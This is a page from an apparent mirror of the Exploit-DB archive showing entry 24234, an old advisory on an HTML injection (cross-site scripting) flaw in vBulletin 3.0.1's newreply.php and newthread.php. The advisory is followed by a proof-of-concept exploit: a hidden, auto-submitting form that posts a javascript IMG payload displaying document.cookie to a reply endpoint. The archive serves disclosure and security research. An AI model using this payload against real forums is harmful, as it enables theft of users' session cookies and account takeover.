bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/24234.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
958 B
HTML
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/10602/info
VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.
An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.
This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.
<form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;
Reference in a new issue View git blame Copy permalink